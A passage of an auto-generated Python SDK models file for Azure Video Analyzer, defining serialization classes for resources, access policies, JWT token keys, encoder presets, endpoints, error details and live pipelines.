'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
}
def __init__(
self,
**kwargs
):
super(Resource, self).__init__(**kwargs)
self.id = None
self.name = None
self.type = None
self.system_data = None
class ProxyResource(Resource):
"""The resource model definition for a Azure Resource Manager proxy resource. It will not have tags and a location.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
}
def __init__(
self,
**kwargs
):
super(ProxyResource, self).__init__(**kwargs)
class AccessPolicyEntity(ProxyResource):
"""Access policies help define the authentication rules, and control access to specific video resources.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param role: Defines the access level granted by this policy. Possible values include:
"Reader".
:type role: str or ~video_analyzer.models.AccessPolicyRole
:param authentication: Authentication method to be used when validating client API access.
:type authentication: ~video_analyzer.models.AuthenticationBase
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'role': {'key': 'properties.role', 'type': 'str'},
'authentication': {'key': 'properties.authentication', 'type': 'AuthenticationBase'},
}
def __init__(
self,
**kwargs
):
super(AccessPolicyEntity, self).__init__(**kwargs)
self.role = kwargs.get('role', None)
self.authentication = kwargs.get('authentication', None)
class AccessPolicyEntityCollection(msrest.serialization.Model):
"""A collection of AccessPolicyEntity items.
:param value: A collection of AccessPolicyEntity items.
:type value: list[~video_analyzer.models.AccessPolicyEntity]
:param next_link: A link to the next page of the collection (when the collection contains too
many results to return in one response).
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[AccessPolicyEntity]'},
'next_link': {'key': '@nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(AccessPolicyEntityCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class AccountEncryption(msrest.serialization.Model):
"""Defines how the Video Analyzer account is (optionally) encrypted.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param type: Required. The type of key used to encrypt the Account Key. Possible values
include: "SystemKey", "CustomerKey".
:type type: str or ~video_analyzer.models.AccountEncryptionKeyType
:param key_vault_properties: The properties of the key used to encrypt the account.
:type key_vault_properties: ~video_analyzer.models.KeyVaultProperties
:param identity: The Key Vault identity.
:type identity: ~video_analyzer.models.ResourceIdentity
:ivar status: The current status of the Key Vault mapping.
:vartype status: str
"""
_validation = {
'type': {'required': True},
'status': {'readonly': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'key_vault_properties': {'key': 'keyVaultProperties', 'type': 'KeyVaultProperties'},
'identity': {'key': 'identity', 'type': 'ResourceIdentity'},
'status': {'key': 'status', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(AccountEncryption, self).__init__(**kwargs)
self.type = kwargs['type']
self.key_vault_properties = kwargs.get('key_vault_properties', None)
self.identity = kwargs.get('identity', None)
self.status = None
class AudioEncoderBase(msrest.serialization.Model):
"""Base type for all audio encoder presets, which define the recipe or instructions on how audio should be processed.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: AudioEncoderAac.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param bitrate_kbps: Bitrate, in kilobits per second or Kbps, at which audio should be encoded
(2-channel stereo audio at a sampling rate of 48 kHz). Allowed values are 96, 112, 128, 160,
192, 224, and 256. If omitted, the bitrate of the input audio is used.
:type bitrate_kbps: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'bitrate_kbps': {'key': 'bitrateKbps', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.AudioEncoderAac': 'AudioEncoderAac'}
}
def __init__(
self,
**kwargs
):
super(AudioEncoderBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
self.bitrate_kbps = kwargs.get('bitrate_kbps', None)
class AudioEncoderAac(AudioEncoderBase):
"""A custom preset for encoding audio with the AAC codec.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param bitrate_kbps: Bitrate, in kilobits per second or Kbps, at which audio should be encoded
(2-channel stereo audio at a sampling rate of 48 kHz). Allowed values are 96, 112, 128, 160,
192, 224, and 256. If omitted, the bitrate of the input audio is used.
:type bitrate_kbps: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'bitrate_kbps': {'key': 'bitrateKbps', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(AudioEncoderAac, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.AudioEncoderAac' # type: str
class AuthenticationBase(msrest.serialization.Model):
"""Base class for access policies authentication methods.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: JwtAuthentication.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.JwtAuthentication': 'JwtAuthentication'}
}
def __init__(
self,
**kwargs
):
super(AuthenticationBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class CertificateSource(msrest.serialization.Model):
"""Base class for certificate sources.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: PemCertificateList.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.PemCertificateList': 'PemCertificateList'}
}
def __init__(
self,
**kwargs
):
super(CertificateSource, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class CheckNameAvailabilityRequest(msrest.serialization.Model):
"""The check availability request body.
:param name: The name of the resource for which availability needs to be checked.
:type name: str
:param type: The resource type.
:type type: str
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(CheckNameAvailabilityRequest, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.type = kwargs.get('type', None)
class CheckNameAvailabilityResponse(msrest.serialization.Model):
"""The check availability result.
:param name_available: Indicates if the resource name is available.
:type name_available: bool
:param reason: The reason why the given name is not available. Possible values include:
"Invalid", "AlreadyExists".
:type reason: str or ~video_analyzer.models.CheckNameAvailabilityReason
:param message: Detailed reason why the given name is available.
:type message: str
"""
_attribute_map = {
'name_available': {'key': 'nameAvailable', 'type': 'bool'},
'reason': {'key': 'reason', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(CheckNameAvailabilityResponse, self).__init__(**kwargs)
self.name_available = kwargs.get('name_available', None)
self.reason = kwargs.get('reason', None)
self.message = kwargs.get('message', None)
class CredentialsBase(msrest.serialization.Model):
"""Base class for credential objects.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: UsernamePasswordCredentials.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.UsernamePasswordCredentials': 'UsernamePasswordCredentials'}
}
def __init__(
self,
**kwargs
):
super(CredentialsBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class TokenKey(msrest.serialization.Model):
"""Key properties for JWT token validation.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: EccTokenKey, RsaTokenKey.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param kid: Required. JWT token key id. Validation keys are looked up based on the key id
present on the JWT token header.
:type kid: str
"""
_validation = {
'type': {'required': True},
'kid': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'kid': {'key': 'kid', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.EccTokenKey': 'EccTokenKey', '#Microsoft.VideoAnalyzer.RsaTokenKey': 'RsaTokenKey'}
}
def __init__(
self,
**kwargs
):
super(TokenKey, self).__init__(**kwargs)
self.type = None # type: Optional[str]
self.kid = kwargs['kid']
class EccTokenKey(TokenKey):
"""Required validation properties for tokens generated with Elliptical Curve algorithm.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param kid: Required. JWT token key id. Validation keys are looked up based on the key id
present on the JWT token header.
:type kid: str
:param alg: Required. Elliptical curve algorithm to be used: ES256, ES384 or ES512. Possible
values include: "ES256", "ES384", "ES512".
:type alg: str or ~video_analyzer.models.AccessPolicyEccAlgo
:param x: Required. X coordinate.
:type x: str
:param y: Required. Y coordinate.
:type y: str
"""
_validation = {
'type': {'required': True},
'kid': {'required': True},
'alg': {'required': True},
'x': {'required': True},
'y': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'kid': {'key': 'kid', 'type': 'str'},
'alg': {'key': 'alg', 'type': 'str'},
'x': {'key': 'x', 'type': 'str'},
'y': {'key': 'y', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(EccTokenKey, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.EccTokenKey' # type: str
self.alg = kwargs['alg']
self.x = kwargs['x']
self.y = kwargs['y']
class EdgeModuleEntity(ProxyResource):
"""The representation of an edge module.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:ivar edge_module_id: Internal ID generated for the instance of the Video Analyzer edge module.
:vartype edge_module_id: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'edge_module_id': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'edge_module_id': {'key': 'properties.edgeModuleId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(EdgeModuleEntity, self).__init__(**kwargs)
self.edge_module_id = None
class EdgeModuleEntityCollection(msrest.serialization.Model):
"""A collection of EdgeModuleEntity items.
:param value: A collection of EdgeModuleEntity items.
:type value: list[~video_analyzer.models.EdgeModuleEntity]
:param next_link: A link to the next page of the collection (when the collection contains too
many results to return in one response).
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[EdgeModuleEntity]'},
'next_link': {'key': '@nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(EdgeModuleEntityCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class EdgeModuleProvisioningToken(msrest.serialization.Model):
"""Provisioning token properties. A provisioning token allows for a single instance of Azure Video analyzer IoT edge module to be initialized and authorized to the cloud account. The provisioning token itself is short lived and it is only used for the initial handshake between IoT edge module and the cloud. After the initial handshake, the IoT edge module will agree on a set of authentication keys which will be auto-rotated as long as the module is able to periodically connect to the cloud. A new provisioning token can be generated for the same IoT edge module in case the module state lost or reset.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar expiration_date: The expiration date of the registration token. The Azure Video Analyzer
IoT edge module must be initialized and connected to the Internet prior to the token expiration
date.
:vartype expiration_date: ~datetime.datetime
:ivar token: The token blob to be provided to the Azure Video Analyzer IoT edge module through
the Azure IoT Edge module twin properties.
:vartype token: str
"""
_validation = {
'expiration_date': {'readonly': True},
'token': {'readonly': True},
}
_attribute_map = {
'expiration_date': {'key': 'expirationDate', 'type': 'iso-8601'},
'token': {'key': 'token', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(EdgeModuleProvisioningToken, self).__init__(**kwargs)
self.expiration_date = None
self.token = None
class EncoderPresetBase(msrest.serialization.Model):
"""Base type for all encoder presets, which define the recipe or instructions on how the input content should be processed.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: EncoderCustomPreset, EncoderSystemPreset.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.EncoderCustomPreset': 'EncoderCustomPreset', '#Microsoft.VideoAnalyzer.EncoderSystemPreset': 'EncoderSystemPreset'}
}
def __init__(
self,
**kwargs
):
super(EncoderPresetBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class EncoderCustomPreset(EncoderPresetBase):
"""Describes a custom preset for encoding the input content using the encoder processor.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param audio_encoder: Describes a custom preset for encoding audio.
:type audio_encoder: ~video_analyzer.models.AudioEncoderBase
:param video_encoder: Describes a custom preset for encoding video.
:type video_encoder: ~video_analyzer.models.VideoEncoderBase
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'audio_encoder': {'key': 'audioEncoder', 'type': 'AudioEncoderBase'},
'video_encoder': {'key': 'videoEncoder', 'type': 'VideoEncoderBase'},
}
def __init__(
self,
**kwargs
):
super(EncoderCustomPreset, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.EncoderCustomPreset' # type: str
self.audio_encoder = kwargs.get('audio_encoder', None)
self.video_encoder = kwargs.get('video_encoder', None)
class NodeBase(msrest.serialization.Model):
"""Base class for nodes.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: ProcessorNodeBase, SinkNodeBase, SourceNodeBase.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.ProcessorNodeBase': 'ProcessorNodeBase', '#Microsoft.VideoAnalyzer.SinkNodeBase': 'SinkNodeBase', '#Microsoft.VideoAnalyzer.SourceNodeBase': 'SourceNodeBase'}
}
def __init__(
self,
**kwargs
):
super(NodeBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
self.name = kwargs['name']
class ProcessorNodeBase(NodeBase):
"""Base class for topology processor nodes.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: EncoderProcessor.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
:param inputs: Required. An array of upstream node references within the topology to be used as
inputs for this node.
:type inputs: list[~video_analyzer.models.NodeInput]
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
'inputs': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'inputs': {'key': 'inputs', 'type': '[NodeInput]'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.EncoderProcessor': 'EncoderProcessor'}
}
def __init__(
self,
**kwargs
):
super(ProcessorNodeBase, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.ProcessorNodeBase' # type: str
self.inputs = kwargs['inputs']
class EncoderProcessor(ProcessorNodeBase):
"""Encoder processor allows for encoding of the input content. For example, it can used to change the resolution from 4K to 1280x720.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
:param inputs: Required. An array of upstream node references within the topology to be used as
inputs for this node.
:type inputs: list[~video_analyzer.models.NodeInput]
:param preset: Required. The encoder preset, which defines the recipe or instructions on how
the input content should be processed.
:type preset: ~video_analyzer.models.EncoderPresetBase
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
'inputs': {'required': True},
'preset': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'inputs': {'key': 'inputs', 'type': '[NodeInput]'},
'preset': {'key': 'preset', 'type': 'EncoderPresetBase'},
}
def __init__(
self,
**kwargs
):
super(EncoderProcessor, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.EncoderProcessor' # type: str
self.preset = kwargs['preset']
class EncoderSystemPreset(EncoderPresetBase):
"""Describes a built-in preset for encoding the input content using the encoder processor.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Name of the built-in encoding preset. Possible values include:
"SingleLayer_540p_H264_AAC", "SingleLayer_720p_H264_AAC", "SingleLayer_1080p_H264_AAC",
"SingleLayer_2160p_H264_AAC".
:type name: str or ~video_analyzer.models.EncoderSystemPresetType
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(EncoderSystemPreset, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.EncoderSystemPreset' # type: str
self.name = kwargs['name']
class Endpoint(msrest.serialization.Model):
"""The endpoint details.
All required parameters must be populated in order to send to Azure.
:param endpoint_url: The URL of the endpoint.
:type endpoint_url: str
:param type: Required. The type of the endpoint. Possible values include: "ClientApi".
:type type: str or ~video_analyzer.models.VideoAnalyzerEndpointType
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'endpoint_url': {'key': 'endpointUrl', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Endpoint, self).__init__(**kwargs)
self.endpoint_url = kwargs.get('endpoint_url', None)
self.type = kwargs['type']
class EndpointBase(msrest.serialization.Model):
"""Base class for endpoints.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: TlsEndpoint, UnsecuredEndpoint.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param credentials: Required. Credentials to be presented to the endpoint.
:type credentials: ~video_analyzer.models.CredentialsBase
:param url: Required. The endpoint URL for Video Analyzer to connect to.
:type url: str
:param tunnel: Describes the tunnel through which Video Analyzer can connect to the endpoint
URL. This is an optional property, typically used when the endpoint is behind a firewall.
:type tunnel: ~video_analyzer.models.TunnelBase
"""
_validation = {
'type': {'required': True},
'credentials': {'required': True},
'url': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'credentials': {'key': 'credentials', 'type': 'CredentialsBase'},
'url': {'key': 'url', 'type': 'str'},
'tunnel': {'key': 'tunnel', 'type': 'TunnelBase'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.TlsEndpoint': 'TlsEndpoint', '#Microsoft.VideoAnalyzer.UnsecuredEndpoint': 'UnsecuredEndpoint'}
}
def __init__(
self,
**kwargs
):
super(EndpointBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
self.credentials = kwargs['credentials']
self.url = kwargs['url']
self.tunnel = kwargs.get('tunnel', None)
class ErrorAdditionalInfo(msrest.serialization.Model):
"""The resource management error additional info.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar type: The additional info type.
:vartype type: str
:ivar info: The additional info.
:vartype info: any
"""
_validation = {
'type': {'readonly': True},
'info': {'readonly': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'info': {'key': 'info', 'type': 'object'},
}
def __init__(
self,
**kwargs
):
super(ErrorAdditionalInfo, self).__init__(**kwargs)
self.type = None
self.info = None
class ErrorDetail(msrest.serialization.Model):
"""The error detail.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar code: The error code.
:vartype code: str
:ivar message: The error message.
:vartype message: str
:ivar target: The error target.
:vartype target: str
:ivar details: The error details.
:vartype details: list[~video_analyzer.models.ErrorDetail]
:ivar additional_info: The error additional info.
:vartype additional_info: list[~video_analyzer.models.ErrorAdditionalInfo]
"""
_validation = {
'code': {'readonly': True},
'message': {'readonly': True},
'target': {'readonly': True},
'details': {'readonly': True},
'additional_info': {'readonly': True},
}
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
'target': {'key': 'target', 'type': 'str'},
'details': {'key': 'details', 'type': '[ErrorDetail]'},
'additional_info': {'key': 'additionalInfo', 'type': '[ErrorAdditionalInfo]'},
}
def __init__(
self,
**kwargs
):
super(ErrorDetail, self).__init__(**kwargs)
self.code = None
self.message = None
self.target = None
self.details = None
self.additional_info = None
class ErrorResponse(msrest.serialization.Model):
"""Common error response for all Azure Resource Manager APIs to return error details for failed operations. (This also follows the OData error response format.).
:param error: The error object.
:type error: ~video_analyzer.models.ErrorDetail
"""
_attribute_map = {
'error': {'key': 'error', 'type': 'ErrorDetail'},
}
def __init__(
self,
**kwargs
):
super(ErrorResponse, self).__init__(**kwargs)
self.error = kwargs.get('error', None)
class GroupLevelAccessControl(msrest.serialization.Model):
"""Group level network access control.
:param public_network_access: Whether or not public network access is allowed for specified
resources under the Video Analyzer account. Possible values include: "Enabled", "Disabled".
:type public_network_access: str or ~video_analyzer.models.PublicNetworkAccess
"""
_attribute_map = {
'public_network_access': {'key': 'publicNetworkAccess', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(GroupLevelAccessControl, self).__init__(**kwargs)
self.public_network_access = kwargs.get('public_network_access', None)
class IotHub(msrest.serialization.Model):
"""The IoT Hub details.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param id: Required. The IoT Hub resource identifier.
:type id: str
:param identity: Required. The IoT Hub identity.
:type identity: ~video_analyzer.models.ResourceIdentity
:ivar status: The current status of the Iot Hub mapping.
:vartype status: str
"""
_validation = {
'id': {'required': True},
'identity': {'required': True},
'status': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'identity': {'key': 'identity', 'type': 'ResourceIdentity'},
'status': {'key': 'status', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(IotHub, self).__init__(**kwargs)
self.id = kwargs['id']
self.identity = kwargs['identity']
self.status = None
class JwtAuthentication(AuthenticationBase):
"""Properties for access validation based on JSON Web Tokens (JWT).
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param issuers: List of expected token issuers. Token issuer is valid if it matches at least
one of the given values.
:type issuers: list[str]
:param audiences: List of expected token audiences. Token audience is valid if it matches at
least one of the given values.
:type audiences: list[str]
:param claims: List of additional token claims to be validated. Token must contains all claims
and respective values for it to be valid.
:type claims: list[~video_analyzer.models.TokenClaim]
:param keys: List of keys which can be used to validate access tokens. Having multiple keys
allow for seamless key rotation of the token signing key. Token signature must match exactly
one key.
:type keys: list[~video_analyzer.models.TokenKey]
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'issuers': {'key': 'issuers', 'type': '[str]'},
'audiences': {'key': 'audiences', 'type': '[str]'},
'claims': {'key': 'claims', 'type': '[TokenClaim]'},
'keys': {'key': 'keys', 'type': '[TokenKey]'},
}
def __init__(
self,
**kwargs
):
super(JwtAuthentication, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.JwtAuthentication' # type: str
self.issuers = kwargs.get('issuers', None)
self.audiences = kwargs.get('audiences', None)
self.claims = kwargs.get('claims', None)
self.keys = kwargs.get('keys', None)
class KeyVaultProperties(msrest.serialization.Model):
"""The details for accessing the encryption keys in Key Vault.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param key_identifier: Required. The URL of the Key Vault key used to encrypt the account. The
key may either be versioned (for example https://vault/keys/mykey/version1) or reference a key
without a version (for example https://vault/keys/mykey).
:type key_identifier: str
:ivar current_key_identifier: The current key used to encrypt Video Analyzer account, including
the key version.
:vartype current_key_identifier: str
"""
_validation = {
'key_identifier': {'required': True},
'current_key_identifier': {'readonly': True},
}
_attribute_map = {
'key_identifier': {'key': 'keyIdentifier', 'type': 'str'},
'current_key_identifier': {'key': 'currentKeyIdentifier', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(KeyVaultProperties, self).__init__(**kwargs)
self.key_identifier = kwargs['key_identifier']
self.current_key_identifier = None
class ListProvisioningTokenInput(msrest.serialization.Model):
"""The input parameters to generate registration token for the Azure Video Analyzer IoT edge module.
All required parameters must be populated in order to send to Azure.
:param expiration_date: Required. The desired expiration date of the registration token. The
Azure Video Analyzer IoT edge module must be initialized and connected to the Internet prior to
the token expiration date.
:type expiration_date: ~datetime.datetime
"""
_validation = {
'expiration_date': {'required': True},
}
_attribute_map = {
'expiration_date': {'key': 'expirationDate', 'type': 'iso-8601'},
}
def __init__(
self,
**kwargs
):
super(ListProvisioningTokenInput, self).__init__(**kwargs)
self.expiration_date = kwargs['expiration_date']
class LivePipeline(ProxyResource):
"""Live pipeline represents a unique instance of a live topology, used for real-time ingestion, archiving and publishing of content for a unique RTSP camera.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param topology_name: The reference to an existing pipeline topology defined for real-time
content processing. When activated, this live pipeline will process content according to the
pipeline topology definition.
:type topology_name: str
:param description: An optional description for the pipeline.
:type description: str
:param bitrate_kbps: Maximum bitrate capacity in Kbps reserved for the live pipeline. The
allowed range is from 500 to 3000 Kbps in increments of 100 Kbps. If the RTSP camera exceeds
this capacity, then the service will disconnect temporarily from the camera. It will retry to
re-establish connection (with exponential backoff), checking to see if the camera bitrate is
now below the reserved capacity. Doing so will ensure that one 'noisy neighbor' does not affect
other live pipelines in your account.
:type bitrate_kbps: int
:ivar state: Current state of the pipeline (read-only). Possible values include: "Inactive",
"Activating", "Active", "Deactivating".
:vartype state: str or ~video_analyzer.models.LivePipelineState
:param parameters: List of the instance level parameter values for the user-defined topology
parameters. A pipeline can only define or override parameters values for parameters which have
been declared in the referenced topology. Topology parameters without a default value must be
defined. Topology parameters with a default value can be optionally be overridden.
:type parameters: list[~video_analyzer.models.ParameterDefinition]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'state': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'topology_name': {'key': 'properties.topologyName', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'bitrate_kbps': {'key': 'properties.bitrateKbps', 'type': 'int'},
'state': {'key': 'properties.state', 'type': 'str'},
'parameters': {'key': 'properties.parameters', 'type': '[ParameterDefinition]'},
}
def __init__(
self,
**kwargs
):
super(LivePipeline, self).__init__(**kwargs)
self.topology_name = kwargs.get('topology_name', None)
self.description = kwargs.get('description', None)
self.bitrate_kbps = kwargs.get('bitrate_kbps', None)
self.state = None
self.parameters = kwargs.get('parameters', None)
class LivePipelineCollection(msrest.serialization.Model):
"""A collection of LivePipeline items.
:param value: A collection of LivePipeline items.
:type value: list[~video_analyzer.models.LivePipeline]
